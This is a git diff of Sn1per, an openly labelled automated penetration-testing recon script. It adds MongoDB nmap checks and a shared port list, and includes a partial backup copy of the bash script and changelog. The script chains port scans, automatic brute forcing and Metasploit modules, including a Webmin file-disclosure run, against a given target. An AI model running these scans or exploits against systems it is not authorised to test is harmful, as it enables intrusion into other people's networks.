diff --git a/CHANGELOG.md b/CHANGELOG.md
index fd12072..8c9b14e 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,4 +1,6 @@
 ## CHANGELOG:
+* v2.2d - Added MongoDB checks
+* v2.2d - Improved NMap scanning options
 * v2.2c - Added CouchDB checks
 * v2.2c - Updated Sub-domain takeover list
 * v2.2b - Added fullportonly mode to do exclusive full port scans
diff --git a/CHANGELOG.md~ b/CHANGELOG.md~
new file mode 100644
index 0000000..fd12072
--- /dev/null
+++ b/CHANGELOG.md~
@@ -0,0 +1,133 @@
+## CHANGELOG:
+* v2.2c - Added CouchDB checks
+* v2.2c - Updated Sub-domain takeover list
+* v2.2b - Added fullportonly mode to do exclusive full port scans
+* v2.2b - Fixed minor issue with Metasploit Pro not starting
+* v2.2b - Fixed minor issue with sniper loot command
+* v2.2a - Fixed minor issue with loot function
+* v2.2 - Added auto Metasploit Pro & Zenmap GUI integration
+* v2.2 - Added Sn1per workspaces to loot directory
+* v2.1d - Added crt.sh sub-domain check
+* v2.1d - Removed blank screenshots from loot directory
+* v2.1c - Fixed issue with install.sh install directories
+* v2.1b - Added automatic Metasploit NMap xml imports for loot directory
+* v2.1b - Removed Zenmap
+* v2.1a - Separated Arachni reports for port 80/443/tcp
+* v2.1a - Fixed NMap full port scan options
+* v2.1 - Added Arachni with auto HTML web reporting (web mode only)
+* v2.1 - Added full NMap detailed port scans
+* v2.1 - Added port 4443/tcp checks
+* v2.1 - Added META tag scans for web apps
+* v2.1 - Removed Uniscan from web mode
+* v2.1 - Removed SQLMap from web mode
+* v2.0b - Added help option --help
+* v2.0a - Fixed issue with ssh-audit
+* v2.0a - Fixed issue with 'discover' mode
+* v2.0 - Updated sub-domain takeover list
+* v2.0 - Improved scan performance for stealth, airstrike and discover modes
+* v2.0 - Removed jexboss due to clear screen issue with output
+* v2.0 - Auto loot directory sorting for all tools
+* v2.0 - Updated install.sh package list
+* v1.9c - Enabled BruteX automated brute force attacks
+* v1.9b - Fixed MSSQL port 1433/tcp port scan check (@hacktrack)
+* v1.9a - Removed testssl script from stealth mode scans
+* v1.9 - Added Ubuntu docker image for Sn1per (@menzow)
+* v1.9 - Added automatic loot directory sorting for all modes
+* v1.9 - Added MSSQL port 1433/tcp checks
+* v1.9 - Added SNMP port 162/tcp checks (@hexageek)
+* v1.9 - Added nslookup to install.sh
+* v1.9 - Fixed install.sh dependency duplicates
+* v1.8c - Added -A option to all NMap port scans
+* v1.8c - Fixed install.sh permission issue
+* v1.8c - Fixed install.sh cleanup options
+* v1.8c - Added ssh-audit
+* v1.8c - Added install directory (/usr/share/sniper/) to install script for universal access
+* v1.8c - Fixed issue with Metasploit SSH scans
+* v1.8c - Added auto-update to install.sh to automatically pull latest github release
+* v1.8b - Fixed bug with NMap UDP scan options
+* v1.8b - Fixed install.sh dependencies 
+* v1.8b - Fixed jexboss options
+* v1.8a - Updated sub-domain hijack list of domains (CC: th3gundy)
+* v1.8 - Added sub-domain hijack scans for all sub-domains
+* v1.8 - Added auto explort of all sub-domains to /domains directory
+* v1.8 - Added additional stealth and airstrike checks for port 80 and 443
+* v1.8 - Fixed issue with theHarvester not working with google
+* v1.7g - Added email security/spoofing checks
+* v1.7f - Added Zenmap XML auto-imports 
+* v1.7f - Added ClamAV RCE Nmap script
+* v1.7e - Fixed minor issue with airstrike and nuke mode
+* v1.7e - Fixed minor issues with discover mode
+* v1.7e - Added minor cosmetic improvements to reports
+* v1.7e - Disabled automatic brute forcing by default
+* v1.7e - Added automatic brute force setting in script vars
+* v1.7d - Added sslyze
+* v1.7d - Added 'discover' mode for full subnet scans
+* v1.7d - Added verbosity to scan tasks to separate sub-tasks better
+* v1.7c - Added plain text reporting 
+* v1.7c - Improved loot directory structure and sorting
+* v1.7b - Fixed issue with airstrike mode not scanning correctly
+* v1.7b - Improved passive recon performance
+* v1.7a - Improved NMap http scan performance
+* v1.7a - Removed joomscan due to verbosity issues
+* v1.7 - Added uniscan web vulnerability scanner
+* v1.7 - Added joomscan Joomla scanner
+* v1.7 - Improved web scan performance
+* v1.7 - Fixed issue with inurlbr output
+* v1.7 - Added remote desktop viewing for RDP connections
+* v1.7 - Added experimental Metasploit exploit for Apache Struts RCE (CVE-2016-3081)
+* v1.6e - Added reporting option for nobrute mode (CC. @mero01)
+* v1.6e - Improved SMB scan performance/optimization added
+* v1.6d - Improved NMap scan performance options
+* v1.6d - Added xprobe2 OS finger printing tool
+* v1.6d - Added jexbos JBoss autopwn
+* v1.6d - Merged fix for theharvester package (CC. @RubenRocha)
+* v1.6d - Merged fix for SuperMicroScanner (CC. @mero01)
+* v1.6c - Add report mode for web scans
+* v1.6c - Fixed issues with Sublist3r and theharvester
+* v1.6c - Added Shocker Shellshock exploitation scanner
+* v1.6b - Added Sublist3r sub-domain brute tool
+* v1.6b - Added cutycapt web screenshot util
+* v1.6a - Added improvements to recon phase
+* v1.6a - Fixed small issue with 3rd party extension
+* v1.6a - Various improvements to overall optimization of scans
+* v1.6a - Added new "web" mode for full web application scans 
+* v1.6 - Added 4 new modes including: stealth, port, airstrike and nuke
+* v1.6 - Added Java de-serialization scanner
+* v1.6 - Added reporting option to output to console and text file for all scans
+* v1.6 - Added option to set Sn1per full path for universal command line access
+* v1.6 - Added in DirBuster for web file brute forcing
+* v1.6 - Fixed issue with sderr errors in TheHarvester
+* v1.5e - Removed shodan command line tool due to issues
+* v1.5e - Fixed wafwoof installation in kali 2.0
+* v1.5d - Fixed minor issues with port 513/tmp and 514/tcp checks
+* v1.5c - Fixed issue which broke link to sniper directory
+* v1.5b - Added Squid Proxy checks port 3128/tcp
+* v1.5b - Fixed shodan setup options in install.sh
+* v1.5b - Fixed syntax error with theHarvester in install.sh
+* v1.5a - Fixed syntax error with port 8081 checks
+* v1.5a - Added Arachni integration
+* v1.5a - Added vsftpd, proftpd, mysql, unrealircd auto exploits
+* v1.5 - Added Metasploit scan and auto-exploit modules
+* v1.5 - Added additional port checks
+* v1.5 - Added full TCP/UDP NMap XML output
+* v1.5 - Auto tune scan for either IP or hostname/domain
+* v1.4h - Added auto IP/domain name scan configurations
+* v1.4g - Added finger enumeration scripts
+* v1.4g - Fixed nmap -p 445 target issue
+* v1.4g - Fixed smtp-enum target issue
+* v1.4f - Fixed BruteX directory bug
+* v1.4e - Fixed reported errors install.sh
+* v1.4e - Added auto-upgrade option to install.sh for existing Sn1per installs
+* v1.4d - Fixed missing rake gem install dependency
+* v1.4c - Reordered 3rd party extensions
+* v1.4b - Fixed install.sh executable references
+* v1.4b - Fixed Yasou dependencies in install.sh
+* v1.4b - Fixed minor issues with BruteX loot directory
+* v1.4 - Added Yasou for automatic web form brute forcing
+* v1.4 - Added MassBleed for SSL vulnerability detection
+* v1.4 - Added Breach-Miner for detection of breached accounts
+* v1.4 - Fixed minor errors with nmap
+* v1.4 - Removed debug output from goohak from displaying on console
+
+## FUTURE:
+* Add auto logging and reporting to all scans
diff --git a/sniper b/sniper
index 223f6f6..7679c6e 100644
--- a/sniper
+++ b/sniper
@@ -46,6 +46,7 @@ USER_FILE="/usr/share/brutex/wordlists/simple-users.txt"
 PASS_FILE="/usr/share/brutex/wordlists/password.lst"
 DNS_FILE="/usr/share/brutex/wordlists/namelist.txt"
 SUPER_MICRO_SCAN="/usr/share/sniper/plugins/SuperMicro-Password-Scanner/supermicro_scan.sh"
+DEFAULT_PORTS="21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049"
 THREADS="30"
 OKBLUE='\033[94m'
 OKRED='\033[91m'
@@ -229,7 +230,7 @@ if [ "$MODE" = "discover" ]; then
 	echo -e "$OKGREEN + -- ----------------------------=[Checking ARP Cache]=---------------------- -- +$RESET"
 	arp -a -n
 	echo -e "$OKGREEN + -- ----------------------------=[Running Port Discovery Scan]=------------- -- +$RESET"
-	unicornscan $TARGET -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,49152 2>/dev/null | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-ips.txt
+	unicornscan $TARGET -p $DEFAULT_PORTS 2>/dev/null | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-ips.txt
 	echo -e "$OKGREEN + -- ----------------------------=[Current Targets]=------------------------- -- +$RESET"
 	cat $LOOT_DIR/domains/sniper-ips.txt
 	echo -e "$OKGREEN + -- ----------------------------=[Launching Sn1per Scans]=------------------ -- +$RESET"
@@ -335,9 +336,7 @@ if [ "$MODE" = "stealth" ]; then
 	fi
 	echo ""
 	echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
-	nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
-	echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
-	nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
+	nmap -sS -T5 --open -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 	
 	port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 	port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
@@ -482,7 +481,7 @@ if [ "$MODE" = "airstrike" ]; then
 		fi
 		echo ""
 		echo -e "$OKGREEN + -- ----------------------------=[Running port scan]=------------------- -- +$RESET"
-		nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $a -oX $LOOT_DIR/nmap/nmap-$a.xml
+		nmap -sS -T5 --open -p $DEFAULT_PORTS $a -oX $LOOT_DIR/nmap/nmap-$a.xml
 		
 		port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
 		port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
@@ -658,9 +657,7 @@ ping -c 1 $TARGET
 echo ""
 echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
 if [ -z "$OPT1" ]; then
-	nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
-	echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
-	nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
+	nmap -sS -T5 --open -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 elif [ "$OPT1" == "web" ]; then
 	nmap -sV -T5 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 else
@@ -715,6 +712,10 @@ port_8180=`grep 'portid="8180"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_8443=`grep 'portid="8443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_8888=`grep 'portid="8888"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_10000=`grep 'portid="10000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_27017=`grep 'portid="27017"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_27018=`grep 'portid="27018"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_27019=`grep 'portid="27019"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_28017=`grep 'portid="28017"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_49152=`grep 'portid="49152"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 
 if [ -z "$port_21" ];
@@ -1381,6 +1382,38 @@ else
 	msfconsole -x "use auxiliary/admin/webmin/file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
 fi
 
+if [ -z "$port_27017" ];
+then
+	echo -e "$OKRED + -- --=[Port 27017 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 27017 opened... running tests...$RESET"
+	nmap -p 27017 -T5 --script=mongodb* $TARGET
+fi
+
+if [ -z "$port_27018" ];
+then
+	echo -e "$OKRED + -- --=[Port 27018 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 27018 opened... running tests...$RESET"
+	nmap -p 27018 -T5 --script=mongodb* $TARGET
+fi
+
+if [ -z "$port_27019" ];
+then
+	echo -e "$OKRED + -- --=[Port 27019 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 27019 opened... running tests...$RESET"
+	nmap -p 27019 -T5 --script=mongodb* $TARGET
+fi
+
+if [ -z "$port_28017" ];
+then
+	echo -e "$OKRED + -- --=[Port 28017 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 28017 opened... running tests...$RESET"
+	nmap -p 28017 -T5 --script=mongodb* $TARGET
+fi
+
 if [ -z "$port_49152" ];
 then
 	echo -e "$OKRED + -- --=[Port 49152 closed... skipping.$RESET"
diff --git a/sniper~ b/sniper~
new file mode 100644
index 0000000..223f6f6
--- /dev/null
+++ b/sniper~
@@ -0,0 +1,1418 @@
+#!/bin/bash
+# + -- --=[Sn1per v2.2 by 1N3 
+# + -- --=[http://crowdshield.com
+#
+# Sn1per - Automated Pentest Recon Tool
+#
+# FEATURES:
+# - Automatically collect recon info (ie. whois, ping, DNS, etc.)
+# - Automatically collects Google hacking recon info
+# - Automatically run port scans
+# - Automatically brute force sub-domains via DNS
+# - Automatically checks for sub-domain hijacking
+# - Automatically run targeted nmap scripts against open ports
+# - Automatically scans all web applications
+# - Automatically brute forces all open services
+# - Automatically runs targeted metasploit scan and exploit modules
+# - Automatically scan multiple hosts
+#
+# INSTALL:
+# ./install.sh - Installs all dependencies. Best run from Kali Linux. 
+#
+# USAGE:
+# sniper <target>
+# sniper <target> <report>
+# sniper <CIDR> discover <report>
+# sniper <target> stealth <report>
+# sniper <target> port <portnum>
+# sniper <target fullportonly <portnum>
+# sniper <target> web <report>
+# sniper <targets.txt> airstrike <report>
+# sniper <targets.txt> nuke <report>
+# sniper loot
+#
+
+TARGET="$1"
+MODE="$2"
+OPT1="$3"
+INSTALL_DIR="/usr/share/sniper"
+LOOT_DIR="/usr/share/sniper/loot"
+PLUGINS_DIR="/usr/share/sniper/plugins"
+CMSMAP="/usr/share/sniper/plugins/CMSmap/cmsmap.py"
+SAMRDUMP="/usr/share/sniper/bin/samrdump.py"
+DNSDICT6="/usr/share/sniper/bin/dnsdict6"
+INURLBR="/usr/share/sniper/bin/inurlbr.php"
+USER_FILE="/usr/share/brutex/wordlists/simple-users.txt"
+PASS_FILE="/usr/share/brutex/wordlists/password.lst"
+DNS_FILE="/usr/share/brutex/wordlists/namelist.txt"
+SUPER_MICRO_SCAN="/usr/share/sniper/plugins/SuperMicro-Password-Scanner/supermicro_scan.sh"
+THREADS="30"
+OKBLUE='\033[94m'
+OKRED='\033[91m'
+OKGREEN='\033[92m'
+OKORANGE='\033[93m'
+RESET='\e[0m'
+REGEX='^[0-9]+$'
+
+# ENABLE/DISABLE AUTOMATIC BRUTE FORCE
+# DEFAULT IS "1" (ENABLED)
+AUTOBRUTE="1"
+
+# ENABLE/DISABLE FULL DETAILED NMAP SCAN
+# DEFAULT IS "1" (ENABLED)
+FULLNMAPSCAN="1"
+
+cd $INSTALL_DIR
+
+function loot {
+	echo -e "$OKRED                ____               $RESET"
+	echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
+	echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
+	echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
+	echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
+	echo -e "$OKRED               /_/                 $RESET"
+	echo ""
+	echo -e "$OKORANGE + -- --=[Current workspaces...$RESET"
+	cd $LOOT_DIR
+	ls -lh $LOOT_DIR/workspace/
+	echo -e "$OKORANGE + -- --=[Enter a name for the workspace:$RESET"
+	read WORKSPACE
+	if [ -z $WORKSPACE ]; then
+		WORKSPACE="default"
+	fi
+	mkdir -p $LOOT_DIR/workspace/$WORKSPACE 2> /dev/null
+	echo -e "$OKORANGE + -- --=[Generating reports...$RESET"
+	for a in `ls sniper-*.txt 2>/dev/null`; 
+	do 
+		echo "$a" > $LOOT_DIR/reports/$a
+		sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a >> $LOOT_DIR/reports/$a
+		mv $a $LOOT_DIR/output/
+	done
+	echo -e "$OKORANGE + -- --=[Removing blank web screenshots...$RESET"
+	find /usr/share/sniper/loot/screenshots/ -size -10k -exec rm -f {} \; 2> /dev/null
+	rm -f $LOOT_DIR/.fuse_* 2> /dev/null
+	echo -e "$OKORANGE + -- --=[Starting Metasploit service...$RESET"
+	/etc/init.d/metasploit start 2> /dev/null
+	/etc/init.d/postgresql start 2> /dev/null
+	echo -e "$OKORANGE + -- --=[Importing NMap XML files into Metasploit...$RESET"
+	msfconsole -x "workspace -a $WORKSPACE; workspace $WORKSPACE; db_import $LOOT_DIR/nmap/nmap*.xml; hosts; services; exit;"
+	echo -e "$OKORANGE + -- --=[Copying loot to workspace: $WORKSPACE...$RESET"
+	cp -Rf $LOOT_DIR/screenshots/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
+	cp -Rf $LOOT_DIR/nmap/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
+	cp -Rf $LOOT_DIR/domains/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
+	cp -Rf $LOOT_DIR/output/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
+	cp -Rf $LOOT_DIR/reports/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
+	cp -Rf $LOOT_DIR/imports/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
+	cp -Rf $LOOT_DIR/notes/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
+	cp -Rf $LOOT_DIR/web/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
+	rm -Rf $LOOT_DIR/screenshots/ 2> /dev/null
+	rm -Rf $LOOT_DIR/nmap/ 2> /dev/null
+	rm -Rf $LOOT_DIR/domains/ 2> /dev/null
+	rm -Rf $LOOT_DIR/output/ 2> /dev/null
+	rm -Rf $LOOT_DIR/reports/ 2> /dev/null
+	rm -Rf $LOOT_DIR/imports/ 2> /dev/null
+	rm -Rf $LOOT_DIR/notes/ 2> /dev/null
+	rm -Rf $LOOT_DIR/web/ 2> /dev/null
+	mkdir $LOOT_DIR/screenshots/ -p 2> /dev/null
+	mkdir $LOOT_DIR/nmap -p 2> /dev/null
+	mkdir $LOOT_DIR/domains -p 2> /dev/null
+	mkdir $LOOT_DIR/output -p 2> /dev/null
+	mkdir $LOOT_DIR/reports -p 2> /dev/null
+	mkdir $LOOT_DIR/imports -p 2> /dev/null
+	mkdir $LOOT_DIR/notes -p 2> /dev/null
+	mkdir $LOOT_DIR/web -p 2> /dev/null
+	echo -e "$OKORANGE + -- --=[Opening workspace directory...$RESET"
+	iceweasel 2> /dev/null &
+	sleep 2
+	iceweasel $LOOT_DIR/workspace/$WORKSPACE 2> /dev/null &
+	sleep 2
+	echo -e "$OKORANGE + -- --=[Launching Metasploit Pro Web UI...$RESET"
+	iceweasel http://localhost:3001/login 2> /dev/null &
+	echo -e "$OKORANGE + -- --=[Launching Zenmap...$RESET"
+	zenmap -f $LOOT_DIR/workspace/$WORKSPACE/nmap/ 2> /dev/null &
+	echo -e "$OKORANGE + -- --=[Done!$RESET"
+}
+
+function help {
+	echo -e "$OKRED                ____               $RESET"
+	echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
+	echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
+	echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
+	echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
+	echo -e "$OKRED               /_/                 $RESET"
+	echo ""
+	echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
+	echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3$RESET"
+	echo -e "$OKORANGE + -- --=[Usage:"
+	echo ""
+	echo ' [*] sniper <target> <report>'
+	echo ' [*] sniper <target> stealth <report>'
+	echo ' [*] sniper <CIDR> discover'
+	echo ' [*] sniper <target> port <portnum>'
+	echo ' [*] sniper <target> fullportonly <portnum>'
+	echo ' [*] sniper <target> web <report>'
+	echo ' [*] sniper <target> nobrute <report>'
+	echo ' [*] sniper <targets.txt> airstrike <report>'
+	echo ' [*] sniper <targets.txt> nuke <report>'
+	echo ' [*] sniper loot'
+	echo ""
+	echo ' + -- --=[Modes:'
+	echo ''
+   echo ' + -- --=[REPORT: Outputs all results to text in the loot directory for later reference. To enable reporting, append report to any sniper mode or command.'
+   echo ' + -- --=[STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking'
+   echo ' + -- --=[DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.'
+   echo ' + -- --=[PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.'
+   echo ' + -- --=[WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.'
+   echo ' + -- --=[NOBRUTE: Launches a full scan against a target host/domain without brute forcing services.'
+   echo ' + -- --=[AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.'
+   echo ' + -- --=[NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.'
+   echo -e " + -- --=[LOOT: Automatically organizes and displays loot folder in your browser and opens Zenmap GUI with all port scan results. To run, type sniper loot.$RESET"
+   echo ""
+   echo ""
+}
+
+if [ -z $TARGET ]; then
+	echo -e "$OKRED                ____               $RESET"
+	echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
+	echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
+	echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
+	echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
+	echo -e "$OKRED               /_/                 $RESET"
+	echo -e ""
+	echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
+	echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3$RESET"
+	echo -e "$OKORANGE + -- --=[Usage: sniper <target>$RESET"
+	echo ""
+	exit
+fi
+
+if [[ $TARGET = "--help" ]]; then
+	help
+	exit
+fi
+
+if [[ ${TARGET:0:1} =~ $REGEX ]]; 
+	then 
+	SCAN_TYPE="IP"
+else 
+	SCAN_TYPE="DOMAIN"
+fi
+
+if [ "$MODE" = "report" ]; then
+	sniper $TARGET | tee $LOOT_DIR/sniper-$TARGET-`date +%Y%m%d%H%M`.txt 2>&1
+	exit
+fi
+
+if [ "$TARGET" = "loot" ]; then
+	loot
+	exit
+fi
+
+if [ "$MODE" = "discover" ]; then
+	echo -e "$OKRED                                                              ____ /\\"
+	echo -e "$OKRED   Sn1per by 1N3 @CrowdShield                                      \ \\"
+	echo -e "$OKRED   https://crowdshield.com                                          \ \\"
+	echo -e "$OKRED                                                                ___ /  \\"
+	echo -e "$OKRED                                                                    \   \\"
+	echo -e "$OKRED                                                                 === > [ \\"
+	echo -e "$OKRED                                                                    /   \ \\"
+	echo -e "$OKRED                                                                    \   / /"
+	echo -e "$OKRED                                                                 === > [ /"
+	echo -e "$OKRED                                                                    /   /"
+	echo -e "$OKRED                                                                ___ \  /"
+	echo -e "$OKRED                                                                    / /"
+	echo -e "$OKRED                                                              ____ / /"
+	echo -e "$OKRED                                                                   \/$RESET"
+	echo ""
+	echo -e "$OKGREEN + -- ----------------------------=[Running Ping Discovery Scan]=------------- -- +$RESET"
+	nmap -sP $TARGET
+	echo -e "$OKGREEN + -- ----------------------------=[Checking ARP Cache]=---------------------- -- +$RESET"
+	arp -a -n
+	echo -e "$OKGREEN + -- ----------------------------=[Running Port Discovery Scan]=------------- -- +$RESET"
+	unicornscan $TARGET -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,49152 2>/dev/null | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-ips.txt
+	echo -e "$OKGREEN + -- ----------------------------=[Current Targets]=------------------------- -- +$RESET"
+	cat $LOOT_DIR/domains/sniper-ips.txt
+	echo -e "$OKGREEN + -- ----------------------------=[Launching Sn1per Scans]=------------------ -- +$RESET"
+	echo ""
+	if [ "$OPT1" = "report" ]; then
+		for a in `cat $LOOT_DIR/domains/sniper-ips.txt` 
+			do sniper $a stealth report
+		done
+		exit
+	fi	
+	for a in `cat $LOOT_DIR/domains/sniper-ips.txt` 
+		do sniper $a stealth 
+	done
+	exit
+fi
+
+if [ "$MODE" = "web" ]; then
+	if [ "$OPT1" = "report" ]; then
+		sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
+		loot
+		exit
+	fi
+fi
+
+if [ "$MODE" = "stealth" ]; then
+	if [ "$OPT1" = "report" ]; then
+		sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 
+		exit
+	fi
+	echo -e "$OKRED                ____               $RESET"
+	echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
+	echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
+	echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
+	echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
+	echo -e "$OKRED               /_/                 $RESET"
+	echo -e "$RESET"
+	echo -e "$OKORANGE + -- --=[http://crowdshield.com"
+	echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3"
+	echo -e "$OKRED " 	
+	echo -e "$OKRED     ./\."
+	echo -e "$OKRED   ./    '\."
+	echo -e "$OKRED   \.       '\."
+	echo -e "$OKRED     '\.       '\."
+	echo -e "$OKRED        '\.       '\."
+	echo -e "$OKRED           '\.       '\."
+	echo -e "$OKRED           ./           '\."
+	echo -e "$OKRED         ./            ____'\."
+	echo -e "$OKRED       ./                  <  '\."
+	echo -e "$OKRED       \-------\            '>   '\."
+	echo -e "$OKRED         '\=====>        ___<       '\."
+	echo -e "$OKRED        ./-----/             __________'\."
+	echo -e "$OKRED "'       \.------\       _____   ___(_)(_\."\'
+	echo -e "$OKRED          '\=====>          <            ./'"
+	echo -e "$OKRED         ./-----/            '>        ./"
+	echo -e "$OKRED         \.               ___<       ./"
+	echo -e "$OKRED           '\.                     ./"
+	echo -e "$OKRED              '\.                ./"
+	echo -e "$OKRED                 '\.           ./"
+	echo -e "$OKRED                 ./          ./"
+	echo -e "$OKRED               ./          ./  Carl Pilcher"
+	echo -e "$OKRED             ./          ./"
+	echo -e "$OKRED           ./          ./"
+	echo -e "$OKRED         ./          ./"
+	echo -e "$OKRED         \.        ./"
+	echo -e "$OKRED           '\.   ./"
+	echo -e "$OKRED              '\/"
+	echo -e "$RESET"
+	echo -e "$OKORANGE + -- --=[Launching stealth scan: $TARGET $RESET"
+	echo -e "$OKGREEN $RESET"
+	echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET"
+	nslookup $TARGET
+	host $TARGET
+	if [ $SCAN_TYPE == "DOMAIN" ];
+	then
+		echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET"
+		whois $TARGET
+		echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET"
+		theharvester -d $TARGET -l 100 -b bing 2> /dev/null
+		echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
+		dig -x $TARGET
+		dnsenum $TARGET
+		mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
+		echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
